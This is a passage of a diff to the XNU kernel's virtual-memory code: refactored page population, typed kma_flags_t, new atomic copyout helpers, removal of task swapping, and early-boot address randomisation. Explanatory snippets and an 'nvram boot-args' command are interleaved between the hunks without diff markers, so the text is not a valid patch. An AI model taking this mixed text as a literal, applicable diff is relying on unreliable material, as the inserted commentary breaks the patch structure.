                        pmap_set_noencrypt(VM_PAGE_GET_PHYS_PAGE(mem));
                }
        }
+       if (page_list) {
+               panic("%s: page_list too long", __func__);
+       }
        vm_object_unlock(object);
 
        vm_page_lockspin_queues();
        vm_page_wire_count += page_count;
        vm_page_unlock_queues();
-       vm_tag_update_size(tag, ptoa_64(page_count));
-
-#if DEBUG || DEVELOPMENT
-       VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END, page_grab_count, 0, 0, 0);
-       if (task != NULL) {
-               ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, page_grab_count);
-       }
-#endif
+       vm_tag_update_size(tag, size);
 
 #if KASAN
        if (map == compressor_map) {
@@ -824,20 +663,106 @@ kernel_memory_populate(
                kasan_notify_address(addr, size);
        }
 #endif
-       return KERN_SUCCESS;
+}
 
-out:
-       if (page_list) {
-               vm_page_free_list(page_list, FALSE);
-       }
+kern_return_t
+kernel_memory_populate(
+       vm_map_t        map,
+       vm_offset_t     addr,
+       vm_size_t       size,
+       kma_flags_t     flags,
+       vm_tag_t        tag)
+{
+       vm_object_t             object;
+       vm_object_offset_t      offset, pg_offset;
+       kern_return_t           kr = KERN_SUCCESS;
+       vm_page_t               mem;
+       vm_page_t               page_list = NULL;
+       int                     page_count = atop_64(size);
 
 #if DEBUG || DEVELOPMENT
-       VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END, page_grab_count, 0, 0, 0);
-       if (task != NULL && kr == KERN_SUCCESS) {
-               ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, page_grab_count);
-       }
+       VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_START,
+           size, 0, 0, 0);
 #endif
 
+       assert((flags & (KMA_COMPRESSOR | KMA_KOBJECT)) != (KMA_COMPRESSOR | KMA_KOBJECT));
+
+       if (flags & KMA_COMPRESSOR) {
+               pg_offset = page_count * PAGE_SIZE_64;
+
+               do {
+                       for (;;) {
+                               mem = vm_page_grab();
+
+                               if (mem != VM_PAGE_NULL) {
+                                       break;
+                               }
+
+                               VM_PAGE_WAIT();
+                       }
+                       if (KMA_ZERO & flags) {
+                               vm_page_zero_fill(mem);
+                       }
+                       mem->vmp_snext = page_list;
+                       page_list = mem;
+
+                       pg_offset -= PAGE_SIZE_64;
+
+                       kr = pmap_enter_options(kernel_pmap,
+                           addr + pg_offset, VM_PAGE_GET_PHYS_PAGE(mem),
+                           VM_PROT_READ | VM_PROT_WRITE, VM_PROT_NONE, 0, TRUE,
+                           PMAP_OPTIONS_INTERNAL, NULL);
+                       assert(kr == KERN_SUCCESS);
+               } while (pg_offset);
+
+               offset = addr;
+               object = compressor_object;
+
+               vm_object_lock(object);
+
+               for (pg_offset = 0;
+                   pg_offset < size;
+                   pg_offset += PAGE_SIZE_64) {
+                       mem = page_list;
+                       page_list = mem->vmp_snext;
+                       mem->vmp_snext = NULL;
+
+                       vm_page_insert(mem, object, offset + pg_offset);
+                       assert(mem->vmp_busy);
+
+                       mem->vmp_busy = FALSE;
+                       mem->vmp_pmapped = TRUE;
+                       mem->vmp_wpmapped = TRUE;
+                       mem->vmp_q_state = VM_PAGE_USED_BY_COMPRESSOR;
+               }
+               vm_object_unlock(object);
+
+#if KASAN
+               if (map == compressor_map) {
+                       kasan_notify_address_nopoison(addr, size);
+               } else {
+                       kasan_notify_address(addr, size);
+               }
+#endif
+
+#if DEBUG || DEVELOPMENT
+               task_t task = current_task();
+               if (task != NULL) {
+                       ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, page_count);
+               }
+#endif
+       } else {
+               kr = vm_page_alloc_list(page_count, flags, &page_list);
+               if (kr == KERN_SUCCESS) {
+                       kernel_memory_populate_with_pages(map, addr, size,
+                           page_list, flags, tag);
+               }
+       }
+
+#if DEBUG || DEVELOPMENT
+       VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END,
+           page_count, 0, 0, 0);
+#endif
        return kr;
 }
 
@@ -847,7 +772,7 @@ kernel_memory_depopulate(
        vm_map_t           map,
        vm_offset_t        addr,
        vm_size_t          size,
-       int                flags,
+       kma_flags_t        flags,
        vm_tag_t           tag)
 {
        vm_object_t        object;
@@ -956,7 +881,7 @@ kmem_alloc_flags(
        vm_offset_t     *addrp,
        vm_size_t       size,
        vm_tag_t        tag,
-       int             flags)
+       kma_flags_t     flags)
 {
        kern_return_t kr = kernel_memory_allocate(map, addrp, size, 0, flags, tag);
        if (kr == KERN_SUCCESS) {
@@ -1596,6 +1521,68 @@ copyoutmap(
        return kr;
 }
 
+/*
+ *     Routine:        copyoutmap_atomic{32, 64}
+ *     Purpose:
+ *             Like copyoutmap, except that the operation is atomic.
+ *             Takes the value directly rather than a *fromdata pointer.
+ */
+kern_return_t
+copyoutmap_atomic32(
+       vm_map_t                map,
+       uint32_t                value,
+       vm_map_address_t        toaddr)
+{
+       kern_return_t   kr = KERN_SUCCESS;
+       vm_map_t        oldmap;
+
+       if (vm_map_pmap(map) == pmap_kernel()) {
+               /* assume a correct toaddr */
+               *(uint32_t *)toaddr = value;
+       } else if (current_map() == map) {
+               if (copyout_atomic32(value, toaddr) != 0) {
+                       kr = KERN_INVALID_ADDRESS;
+               }
+       } else {
+               vm_map_reference(map);
+               oldmap = vm_map_switch(map);
+               if (copyout_atomic32(value, toaddr) != 0) {
+                       kr = KERN_INVALID_ADDRESS;
+               }
+               vm_map_switch(oldmap);
+               vm_map_deallocate(map);
+       }
+       return kr;
+}
+
+kern_return_t
+copyoutmap_atomic64(
+       vm_map_t                map,
+       uint64_t                value,
+       vm_map_address_t        toaddr)
+{
+       kern_return_t   kr = KERN_SUCCESS;
+       vm_map_t        oldmap;
+
+       if (vm_map_pmap(map) == pmap_kernel()) {
+               /* assume a correct toaddr */
+               *(uint64_t *)toaddr = value;
+       } else if (current_map() == map) {
+               if (copyout_atomic64(value, toaddr) != 0) {
+                       kr = KERN_INVALID_ADDRESS;
+               }
+       } else {
+               vm_map_reference(map);
+               oldmap = vm_map_switch(map);
+               if (copyout_atomic64(value, toaddr) != 0) {
+                       kr = KERN_INVALID_ADDRESS;
+               }
+               vm_map_switch(oldmap);
+               vm_map_deallocate(map);
+       }
+       return kr;
+}
+
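A user-space analogue of the "current map" case of copyoutmap_atomic64() above: the point is that the destination is written with a single atomic store, so a concurrent reader can never observe a torn value. Illustrative only; the kernel path uses copyout_atomic64():

#include <stdatomic.h>
#include <stdint.h>
#include <stdio.h>

/* Single atomic 64-bit store, the property the new helpers guarantee. */
static void
store_atomic64(_Atomic uint64_t *dst, uint64_t value)
{
        atomic_store_explicit(dst, value, memory_order_relaxed);
}

int
main(void)
{
        _Atomic uint64_t slot = 0;
        store_atomic64(&slot, 0x1122334455667788ULL);
        printf("0x%llx\n", (unsigned long long)atomic_load(&slot));
        return 0;
}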
 /*
  *
  *     The following two functions are to be used when exposing kernel
index 2cafcebe2e378b123d1dd46508a5af058c4f2041..5dd4cfda6a08ac9bd3a16d28976a5a2f3a78aa19 100644 (file)
@@ -80,31 +80,39 @@ extern "C" {
 
 #include <kern/locks.h>
 
+struct vm_page;
+
+__options_decl(kma_flags_t, uint32_t, {
+       KMA_NONE        = 0x00000000,
+       KMA_HERE        = 0x00000001,
+       KMA_NOPAGEWAIT  = 0x00000002,
+       KMA_KOBJECT     = 0x00000004,
+       KMA_LOMEM       = 0x00000008,
+       KMA_GUARD_FIRST = 0x00000010,
+       KMA_GUARD_LAST  = 0x00000020,
+       KMA_PERMANENT   = 0x00000040,
+       KMA_NOENCRYPT   = 0x00000080,
+       KMA_KSTACK      = 0x00000100,
+       KMA_VAONLY      = 0x00000200,
+       /*
+        * Pages belonging to the compressor are not on the paging queues,
+        * nor are they counted as wired.
+        */
+       KMA_COMPRESSOR  = 0x00000400,
+       KMA_ATOMIC      = 0x00000800,
+       KMA_ZERO        = 0x00001000,
+       KMA_PAGEABLE    = 0x00002000,
+       KMA_KHEAP       = 0x00004000,  /* Pages belonging to zones backing one of kalloc_heap. */
+});
+
 extern kern_return_t    kernel_memory_allocate(
        vm_map_t        map,
        vm_offset_t     *addrp,
        vm_size_t       size,
        vm_offset_t     mask,
-       int             flags,
+       kma_flags_t     flags,
        vm_tag_t        tag);
 
-/* flags for kernel_memory_allocate */
-#define KMA_HERE        0x01
-#define KMA_NOPAGEWAIT  0x02
-#define KMA_KOBJECT     0x04
-#define KMA_LOMEM       0x08
-#define KMA_GUARD_FIRST 0x10
-#define KMA_GUARD_LAST  0x20
-#define KMA_PERMANENT   0x40
-#define KMA_NOENCRYPT   0x80
-#define KMA_KSTACK      0x100
-#define KMA_VAONLY      0x200
-#define KMA_COMPRESSOR  0x400   /* Pages belonging to the compressor are not on the paging queues, nor are they counted as wired. */
-#define KMA_ATOMIC      0x800
-#define KMA_ZERO        0x1000
-#define KMA_PAGEABLE    0x2000
-#define KMA_KHEAP       0x4000  /* Pages belonging to zones backing one of kalloc_heap. */
-
 extern kern_return_t kmem_alloc(
        vm_map_t        map,
        vm_offset_t     *addrp,
@@ -118,7 +126,7 @@ extern kern_return_t kmem_alloc_contig(
        vm_offset_t     mask,
        ppnum_t         max_pnum,
        ppnum_t         pnum_mask,
-       int             flags,
+       kma_flags_t     flags,
        vm_tag_t        tag);
 
 extern kern_return_t    kmem_alloc_flags(
@@ -126,7 +134,7 @@ extern kern_return_t    kmem_alloc_flags(
        vm_offset_t     *addrp,
        vm_size_t       size,
        vm_tag_t        tag,
-       int             flags);
+       kma_flags_t     flags);
 
 extern kern_return_t    kmem_alloc_pageable(
        vm_map_t        map,
@@ -169,18 +177,26 @@ extern kern_return_t    kmem_alloc_kobject(
        vm_size_t       size,
        vm_tag_t        tag) __XNU_INTERNAL(kmem_alloc_kobject);
 
+extern void kernel_memory_populate_with_pages(
+       vm_map_t        map,
+       vm_offset_t     addr,
+       vm_size_t       size,
+       struct vm_page *page_list,
+       kma_flags_t     flags,
+       vm_tag_t        tag);
+
 extern kern_return_t kernel_memory_populate(
        vm_map_t        map,
        vm_offset_t     addr,
        vm_size_t       size,
-       int             flags,
+       kma_flags_t     flags,
        vm_tag_t        tag);
 
 extern void kernel_memory_depopulate(
        vm_map_t        map,
        vm_offset_t     addr,
        vm_size_t       size,
-       int             flags,
+       kma_flags_t     flags,
        vm_tag_t        tag);
 
 extern kern_return_t    memory_object_iopl_request(
@@ -224,10 +240,8 @@ extern void             vm_tag_update_size(vm_tag_t tag, int64_t size);
 #if VM_MAX_TAG_ZONES
 
 extern void             vm_allocation_zones_init(void);
-extern void             vm_tag_will_update_zone(vm_tag_t tag, uint32_t zidx);
-extern void             vm_tag_update_zone_size(vm_tag_t tag, uint32_t zidx, int64_t delta, int64_t dwaste);
-
-extern vm_allocation_zone_total_t **   vm_allocation_zone_totals;
+extern vm_tag_t         vm_tag_will_update_zone(vm_tag_t tag, uint32_t zidx, uint32_t zflags);
+extern void             vm_tag_update_zone_size(vm_tag_t tag, uint32_t zidx, long delta);
 
 #endif /* VM_MAX_TAG_ZONES */
 
@@ -299,6 +313,16 @@ extern kern_return_t    copyoutmap(
        vm_map_offset_t toaddr,
        vm_size_t       length);
 
+extern kern_return_t    copyoutmap_atomic32(
+       vm_map_t        map,
+       uint32_t        value,
+       vm_map_offset_t toaddr);
+
+extern kern_return_t    copyoutmap_atomic64(
+       vm_map_t        map,
+       uint64_t        value,
+       vm_map_offset_t toaddr);
+
 extern kern_return_t    kmem_alloc_external(
        vm_map_t        map,
        vm_offset_t     *addrp,
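The kma_flags_t change above moves the KMA_* flags from plain #defines to a typed option set. A portable sketch of the same idea, showing how call sites such as vm_mem_bootstrap() combine the bits (the TOY_ names are illustrative stand-ins, not xnu's __options_decl expansion):

/* Portable sketch (not the actual __options_decl expansion) of a typed flag
 * set like kma_flags_t: each option is a distinct bit, OR'd together by callers. */
#include <stdint.h>
#include <stdio.h>

typedef uint32_t toy_kma_flags_t;
enum {
        TOY_KMA_NONE       = 0x00000000,
        TOY_KMA_NOPAGEWAIT = 0x00000002,
        TOY_KMA_KOBJECT    = 0x00000004,
        TOY_KMA_PERMANENT  = 0x00000040,
        TOY_KMA_VAONLY     = 0x00000200,
        TOY_KMA_ZERO       = 0x00001000,
};

int
main(void)
{
        /* mirrors the vm_mem_bootstrap() call: KMA_KOBJECT | KMA_PERMANENT | KMA_VAONLY */
        toy_kma_flags_t flags = TOY_KMA_KOBJECT | TOY_KMA_PERMANENT | TOY_KMA_VAONLY;

        if (flags & TOY_KMA_VAONLY) {
                printf("virtual addresses only, no pages grabbed up front\n");
        }
        return 0;
}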
index 436bd9368dc0cf5eb9e490e255def4d800dea1bf..abe95ed4aae67686ace630dbd9f097fbcbfbb62b 100644 (file)
@@ -63,7 +63,6 @@
  *     Virtual memory mapping module.
  */
 
-#include <task_swapper.h>
 #include <mach_assert.h>
 
 #include <vm/vm_options.h>
@@ -83,7 +82,7 @@
 
 #include <kern/assert.h>
 #include <kern/backtrace.h>
-#include <kern/counters.h>
+#include <kern/counter.h>
 #include <kern/exc_guard.h>
 #include <kern/kalloc.h>
 #include <kern/zalloc_internal.h>
@@ -298,7 +297,6 @@ static kern_return_t    vm_map_remap_extract(
        vm_map_t                map,
        vm_map_offset_t         addr,
        vm_map_size_t           size,
-       vm_prot_t               required_protection,
        boolean_t               copy,
        struct vm_map_header    *map_header,
        vm_prot_t               *cur_protection,
@@ -693,12 +691,16 @@ vm_map_copy_require(struct vm_map_copy *copy)
 }
 
 /*
- *     Placeholder object for submap operations.  This object is dropped
- *     into the range by a call to vm_map_find, and removed when
- *     vm_map_submap creates the submap.
+ *     vm_map_require:
+ *
+ *     Ensures that the argument is memory allocated from the genuine
+ *     vm map zone. (See zone_id_require_allow_foreign).
  */
-
-vm_object_t     vm_submap_object;
+void
+vm_map_require(vm_map_t map)
+{
+       zone_id_require_allow_foreign(ZONE_ID_VM_MAP, sizeof(struct _vm_map), map);
+}
 
 static __startup_data vm_offset_t      map_data;
 static __startup_data vm_size_t        map_data_size;
@@ -787,6 +789,7 @@ vm_map_apple_protected(
        vm_object_offset_t      crypto_start, crypto_end;
        int             vm_flags;
        vm_map_kernel_flags_t vmk_flags;
+       boolean_t       cache_pager;
 
        vm_flags = 0;
        vmk_flags = VM_MAP_KERNEL_FLAGS_NONE;
@@ -888,6 +891,13 @@ vm_map_apple_protected(
                        crypto_backing_offset = VME_OFFSET(&tmp_entry);
                }
 
+               cache_pager = TRUE;
+#if XNU_TARGET_OS_OSX
+               if (vm_map_is_alien(map)) {
+                       cache_pager = FALSE;
+               }
+#endif /* XNU_TARGET_OS_OSX */
+
                /*
                 * Lookup (and create if necessary) the protected memory object
                 * matching that VM object.
@@ -901,7 +911,8 @@ vm_map_apple_protected(
                        crypto_backing_offset,
                        crypt_info,
                        crypto_start,
-                       crypto_end);
+                       crypto_end,
+                       cache_pager);
 
                /* release extra ref on protected object */
                vm_object_deallocate(protected_object);
@@ -1042,8 +1053,8 @@ vm_map_init(void)
            sizeof(debug4k_filter));
 #endif /* MACH_ASSERT */
 
-       vm_map_zone = zone_create(VM_MAP_ZONE_NAME, sizeof(struct _vm_map),
-           VM_MAP_ZFLAGS);
+       vm_map_zone = zone_create_ext(VM_MAP_ZONE_NAME, sizeof(struct _vm_map),
+           VM_MAP_ZFLAGS, ZONE_ID_VM_MAP, NULL);
 
        vm_map_entry_zone = zone_create(mez_name, sizeof(struct vm_map_entry),
            ZC_NOENCRYPT | ZC_NOGZALLOC | ZC_NOCALLOUT);
@@ -1054,9 +1065,7 @@ vm_map_init(void)
         */
        vm_map_entry_reserved_zone = zone_create_ext(VME_RESERVED_ZONE_NAME,
            sizeof(struct vm_map_entry), VM_MAP_RESERVED_ZFLAGS,
-           ZONE_ID_ANY, ^(zone_t z) {
-               zone_set_noexpand(z, 64 * kentry_data_size);
-       });
+           ZONE_ID_ANY, NULL);
 
        vm_map_copy_zone = zone_create_ext("VM map copies", sizeof(struct vm_map_copy),
            ZC_NOENCRYPT | ZC_CACHING, ZONE_ID_VM_MAP_COPY, NULL);
@@ -1067,9 +1076,9 @@ vm_map_init(void)
        /*
         * Add the stolen memory to zones, adjust zone size and stolen counts.
         */
-       zcram(vm_map_zone, map_data, map_data_size);
-       zcram(vm_map_entry_reserved_zone, kentry_data, kentry_data_size);
-       zcram(vm_map_holes_zone, map_holes_data, map_holes_data_size);
+       zone_cram_foreign(vm_map_zone, map_data, map_data_size);
+       zone_cram_foreign(vm_map_entry_reserved_zone, kentry_data, kentry_data_size);
+       zone_cram_foreign(vm_map_holes_zone, map_holes_data, map_holes_data_size);
 
        /*
         * Since these are covered by zones, remove them from stolen page accounting.
@@ -1135,6 +1144,7 @@ static void
 vm_map_steal_memory(void)
 {
        uint16_t kentry_initial_pages;
+       uint16_t zone_foreign_pages;
 
        map_data_size = zone_get_foreign_alloc_size(VM_MAP_ZONE_NAME,
            sizeof(struct _vm_map), VM_MAP_ZFLAGS, 1);
@@ -1145,8 +1155,8 @@ vm_map_steal_memory(void)
         * scheme is activated and/or entries are available from the general
         * map entry pool.
         */
-#if     defined(__LP64__)
-       kentry_initial_pages = 10;
+#if defined(__LP64__)
+       kentry_initial_pages = (uint16_t)atop(16 * 4096);
 #else
        kentry_initial_pages = 6;
 #endif
@@ -1159,6 +1169,10 @@ vm_map_steal_memory(void)
                kentry_initial_pages *= 1024;
        }
 #endif
+       if (PE_parse_boot_argn("zone_foreign_pages", &zone_foreign_pages,
+           sizeof(zone_foreign_pages))) {
+               kentry_initial_pages = zone_foreign_pages;
+       }
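The added block lets a boot-arg override the number of pages stolen for the reserved map-entry and map-holes zones. As a hedged example, on a development machine the argument would typically be injected through the boot-args NVRAM variable (exact procedure depends on the platform and security configuration):

	sudo nvram boot-args="zone_foreign_pages=32"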
 
        kentry_data_size = zone_get_foreign_alloc_size(VME_RESERVED_ZONE_NAME,
            sizeof(struct vm_map_entry), VM_MAP_RESERVED_ZFLAGS,
@@ -1189,12 +1203,12 @@ boolean_t vm_map_supports_hole_optimization = FALSE;
 void
 vm_kernel_reserved_entry_init(void)
 {
-       zone_prio_refill_configure(vm_map_entry_reserved_zone);
+       zone_replenish_configure(vm_map_entry_reserved_zone);
 
        /*
         * Once we have our replenish thread set up, we can start using the vm_map_holes zone.
         */
-       zone_prio_refill_configure(vm_map_holes_zone);
+       zone_replenish_configure(vm_map_holes_zone);
        vm_map_supports_hole_optimization = TRUE;
 }
 
@@ -1298,10 +1312,6 @@ vm_map_create_options(
        result->vmmap_high_start = 0;
 #endif
        os_ref_init_count(&result->map_refcnt, &map_refgrp, 1);
-#if     TASK_SWAPPER
-       result->res_count = 1;
-       result->sw_state = MAP_SW_IN;
-#endif  /* TASK_SWAPPER */
        result->pmap = pmap;
        result->min_offset = min;
        result->max_offset = max;
@@ -1322,6 +1332,7 @@ vm_map_create_options(
        result->jit_entry_exists = FALSE;
        result->is_alien = FALSE;
        result->reserved_regions = FALSE;
+       result->single_jit = FALSE;
 
        /* "has_corpse_footprint" and "holelistenabled" are mutually exclusive */
        if (options & VM_MAP_CREATE_CORPSE_FOOTPRINT) {
@@ -1508,79 +1519,6 @@ first_free_is_valid(
 #define vm_map_copy_entry_unlink(copy, entry)                           \
        _vm_map_store_entry_unlink(&(copy)->cpy_hdr, (entry))
 
-#if     MACH_ASSERT && TASK_SWAPPER
-/*
- *     vm_map_res_reference:
- *
- *     Adds another valid residence count to the given map.
- *
- *     Map is locked so this function can be called from
- *     vm_map_swapin.
- *
- */
-void
-vm_map_res_reference(vm_map_t map)
-{
-       /* assert map is locked */
-       assert(map->res_count >= 0);
-       assert(os_ref_get_count(&map->map_refcnt) >= map->res_count);
-       if (map->res_count == 0) {
-               lck_mtx_unlock(&map->s_lock);
-               vm_map_lock(map);
-               vm_map_swapin(map);
-               lck_mtx_lock(&map->s_lock);
-               ++map->res_count;
-               vm_map_unlock(map);
-       } else {
-               ++map->res_count;
-       }
-}
-
-/*
- *     vm_map_reference_swap:
- *
- *     Adds valid reference and residence counts to the given map.
- *
- *     The map may not be in memory (i.e. zero residence count).
- *
- */
-void
-vm_map_reference_swap(vm_map_t map)
-{
-       assert(map != VM_MAP_NULL);
-       lck_mtx_lock(&map->s_lock);
-       assert(map->res_count >= 0);
-       assert(os_ref_get_count(&map->map_refcnt) >= map->res_count);
-       os_ref_retain_locked(&map->map_refcnt);
-       vm_map_res_reference(map);
-       lck_mtx_unlock(&map->s_lock);
-}
-
-/*
- *     vm_map_res_deallocate:
- *
- *     Decrement residence count on a map; possibly causing swapout.
- *
- *     The map must be in memory (i.e. non-zero residence count).
- *
- *     The map is locked, so this function is callable from vm_map_deallocate.
- *
- */
-void
-vm_map_res_deallocate(vm_map_t map)
-{
-       assert(map->res_count > 0);
-       if (--map->res_count == 0) {
-               lck_mtx_unlock(&map->s_lock);
-               vm_map_lock(map);
-               vm_map_swapout(map);
-               vm_map_unlock(map);
-               lck_mtx_lock(&map->s_lock);
-       }
-       assert(os_ref_get_count(&map->map_refcnt) >= map->res_count);
-}
-#endif  /* MACH_ASSERT && TASK_SWAPPER */
-
 /*
  *     vm_map_destroy:
  *
@@ -1678,193 +1616,6 @@ find_largest_process_vm_map_entries(void)
        return victim_pid;
 }
 
-#if     TASK_SWAPPER
-/*
- * vm_map_swapin/vm_map_swapout
- *
- * Swap a map in and out, either referencing or releasing its resources.
- * These functions are internal use only; however, they must be exported
- * because they may be called from macros, which are exported.
- *
- * In the case of swapout, there could be races on the residence count,
- * so if the residence count is up, we return, assuming that a
- * vm_map_deallocate() call in the near future will bring us back.
- *
- * Locking:
- *     -- We use the map write lock for synchronization among races.
- *     -- The map write lock, and not the simple s_lock, protects the
- *        swap state of the map.
- *     -- If a map entry is a share map, then we hold both locks, in
- *        hierarchical order.
- *
- * Synchronization Notes:
- *     1) If a vm_map_swapin() call happens while swapout in progress, it
- *     will block on the map lock and proceed when swapout is through.
- *     2) A vm_map_reference() call at this time is illegal, and will
- *     cause a panic.  vm_map_reference() is only allowed on resident
- *     maps, since it refuses to block.
- *     3) A vm_map_swapin() call during a swapin will block, and
- *     proceed when the first swapin is done, turning into a nop.
- *     This is the reason the res_count is not incremented until
- *     after the swapin is complete.
- *     4) There is a timing hole after the checks of the res_count, before
- *     the map lock is taken, during which a swapin may get the lock
- *     before a swapout about to happen.  If this happens, the swapin
- *     will detect the state and increment the reference count, causing
- *     the swapout to be a nop, thereby delaying it until a later
- *     vm_map_deallocate.  If the swapout gets the lock first, then
- *     the swapin will simply block until the swapout is done, and
- *     then proceed.
- *
- * Because vm_map_swapin() is potentially an expensive operation, it
- * should be used with caution.
- *
- * Invariants:
- *     1) A map with a residence count of zero is either swapped, or
- *        being swapped.
- *     2) A map with a non-zero residence count is either resident,
- *        or being swapped in.
- */
-
-int vm_map_swap_enable = 1;
-
-void
-vm_map_swapin(vm_map_t map)
-{
-       vm_map_entry_t entry;
-
-       if (!vm_map_swap_enable) {      /* debug */
-               return;
-       }
-
-       /*
-        * Map is locked
-        * First deal with various races.
-        */
-       if (map->sw_state == MAP_SW_IN) {
-               /*
-                * we raced with swapout and won.  Returning will incr.
-                * the res_count, turning the swapout into a nop.
-                */
-               return;
-       }
-
-       /*
-        * The residence count must be zero.  If we raced with another
-        * swapin, the state would have been IN; if we raced with a
-        * swapout (after another competing swapin), we must have lost
-        * the race to get here (see above comment), in which case
-        * res_count is still 0.
-        */
-       assert(map->res_count == 0);
-
-       /*
-        * There are no intermediate states of a map going out or
-        * coming in, since the map is locked during the transition.
-        */
-       assert(map->sw_state == MAP_SW_OUT);
-
-       /*
-        * We now operate upon each map entry.  If the entry is a sub-
-        * or share-map, we call vm_map_res_reference upon it.
-        * If the entry is an object, we call vm_object_res_reference
-        * (this may iterate through the shadow chain).
-        * Note that we hold the map locked the entire time,
-        * even if we get back here via a recursive call in
-        * vm_map_res_reference.
-        */
-       entry = vm_map_first_entry(map);
-
-       while (entry != vm_map_to_entry(map)) {
-               if (VME_OBJECT(entry) != VM_OBJECT_NULL) {
-                       if (entry->is_sub_map) {
-                               vm_map_t lmap = VME_SUBMAP(entry);
-                               lck_mtx_lock(&lmap->s_lock);
-                               vm_map_res_reference(lmap);
-                               lck_mtx_unlock(&lmap->s_lock);
-                       } else {
-                               vm_object_t object = VME_OBJECT(entry);
-                               vm_object_lock(object);
-                               /*
-                                * This call may iterate through the
-                                * shadow chain.
-                                */
-                               vm_object_res_reference(object);
-                               vm_object_unlock(object);
-                       }
-               }
-               entry = entry->vme_next;
-       }
-       assert(map->sw_state == MAP_SW_OUT);
-       map->sw_state = MAP_SW_IN;
-}
-
-void
-vm_map_swapout(vm_map_t map)
-{
-       vm_map_entry_t entry;
-
-       /*
-        * Map is locked
-        * First deal with various races.
-        * If we raced with a swapin and lost, the residence count
-        * will have been incremented to 1, and we simply return.
-        */
-       lck_mtx_lock(&map->s_lock);
-       if (map->res_count != 0) {
-               lck_mtx_unlock(&map->s_lock);
-               return;
-       }
-       lck_mtx_unlock(&map->s_lock);
-
-       /*
-        * There are no intermediate states of a map going out or
-        * coming in, since the map is locked during the transition.
-        */
-       assert(map->sw_state == MAP_SW_IN);
-
-       if (!vm_map_swap_enable) {
-               return;
-       }
-
-       /*
-        * We now operate upon each map entry.  If the entry is a sub-
-        * or share-map, we call vm_map_res_deallocate upon it.
-        * If the entry is an object, we call vm_object_res_deallocate
-        * (this may iterate through the shadow chain).
-        * Note that we hold the map locked the entire time,
-        * even if we get back here via a recursive call in
-        * vm_map_res_deallocate.
-        */
-       entry = vm_map_first_entry(map);
-
-       while (entry != vm_map_to_entry(map)) {
-               if (VME_OBJECT(entry) != VM_OBJECT_NULL) {
-                       if (entry->is_sub_map) {
-                               vm_map_t lmap = VME_SUBMAP(entry);
-                               lck_mtx_lock(&lmap->s_lock);
-                               vm_map_res_deallocate(lmap);
-                               lck_mtx_unlock(&lmap->s_lock);
-                       } else {
-                               vm_object_t object = VME_OBJECT(entry);
-                               vm_object_lock(object);
-                               /*
-                                * This call may take a long time,
-                                * since it could actively push
-                                * out pages (if we implement it
-                                * that way).
-                                */
-                               vm_object_res_deallocate(object);
-                               vm_object_unlock(object);
-                       }
-               }
-               entry = entry->vme_next;
-       }
-       assert(map->sw_state == MAP_SW_IN);
-       map->sw_state = MAP_SW_OUT;
-}
-
-#endif  /* TASK_SWAPPER */
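The block deleted above was the remaining TASK_SWAPPER machinery: each map kept a residence count (res_count) alongside its reference count, and vm_map_swapin()/vm_map_swapout() walked the entries to add or drop residence references on sub-maps and objects. For reference only, a minimal restatement of the retired invariant that the asserts in that code enforced (this sketch is not part of the tree):

static bool
map_swap_invariant_holds(int res_count, int ref_count)
{
	/* a swapped-out map has res_count == 0; a resident map has
	 * res_count > 0, and references never drop below residences */
	return res_count >= 0 && ref_count >= res_count;
}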
 
 /*
  *     vm_map_lookup_entry:    [ internal use only ]
@@ -2321,7 +2072,12 @@ vm_map_random_address_for_size(
        assert(VM_MAP_PAGE_ALIGNED(size, VM_MAP_PAGE_MASK(map)));
 
        while (tries < MAX_TRIES_TO_GET_RANDOM_ADDRESS) {
-               random_addr = ((vm_map_offset_t)random()) << VM_MAP_PAGE_SHIFT(map);
+               if (startup_phase < STARTUP_SUB_ZALLOC) {
+                       random_addr = (vm_map_offset_t)early_random();
+               } else {
+                       random_addr = (vm_map_offset_t)random();
+               }
+               random_addr <<= VM_MAP_PAGE_SHIFT(map);
                random_addr = vm_map_trunc_page(
                        vm_map_min(map) + (random_addr % addr_space_size),
                        VM_MAP_PAGE_MASK(map));
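The randomization loop now uses early_random() before the zalloc subsystem is up (startup_phase < STARTUP_SUB_ZALLOC), because random() cannot be used that early in boot. A simplified, self-contained model of the address derivation one iteration performs (constants and helper names are stand-ins, not kernel code):

#include <stdint.h>

static uint64_t
pick_candidate(uint64_t rnd, uint64_t map_min, uint64_t space_size,
    uint64_t page_shift)
{
	uint64_t page_mask = (1ULL << page_shift) - 1;
	uint64_t addr = rnd << page_shift;       /* spread the value across the space */

	addr = map_min + (addr % space_size);    /* keep the candidate inside the map */
	return addr & ~page_mask;                /* truncate to a page boundary */
}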
@@ -2415,7 +2171,7 @@ vm_map_enter(
        boolean_t               overwrite = ((flags & VM_FLAGS_OVERWRITE) != 0);
        boolean_t               no_cache = ((flags & VM_FLAGS_NO_CACHE) != 0);
        boolean_t               is_submap = vmk_flags.vmkf_submap;
-       boolean_t               permanent = vmk_flags.vmkf_permanent;
+       boolean_t               permanent = (((flags & VM_FLAGS_PERMANENT) != 0) || vmk_flags.vmkf_permanent);
        boolean_t               no_copy_on_read = vmk_flags.vmkf_no_copy_on_read;
        boolean_t               entry_for_jit = vmk_flags.vmkf_map_jit;
        boolean_t               iokit_acct = vmk_flags.vmkf_iokit_acct;
@@ -4649,7 +4405,9 @@ vm_map_enter_mem_object_helper(
                                    (vm_tag_t) copy_vm_alias, /* see comment at end of vm_fault_unwire re. cast*/
                                    copy_object,
                                    copy_offset,
-                                   ((copy_object == NULL) ? FALSE : copy),
+                                   ((copy_object == NULL)
+                                   ? FALSE
+                                   : (copy || copy_entry->needs_copy)),
                                    cur_protection,
                                    max_protection,
                                    inheritance);
@@ -5138,7 +4896,6 @@ vm_map_enter_mem_object_control(
 
        vm_object_lock(object);
        object->ref_count++;
-       vm_object_res_reference(object);
 
        /*
         * For "named" VM objects, let the pager know that the
@@ -6082,6 +5839,7 @@ vm_map_protect(
                 * only.
                 */
                max_prot = new_prot & VM_PROT_ALL;
+               cur_prot = VM_PROT_NONE;
                kflags = VM_MAP_KERNEL_FLAGS_NONE;
                kflags.vmkf_remap_prot_copy = TRUE;
                kflags.vmkf_overwrite_immutable = TRUE;
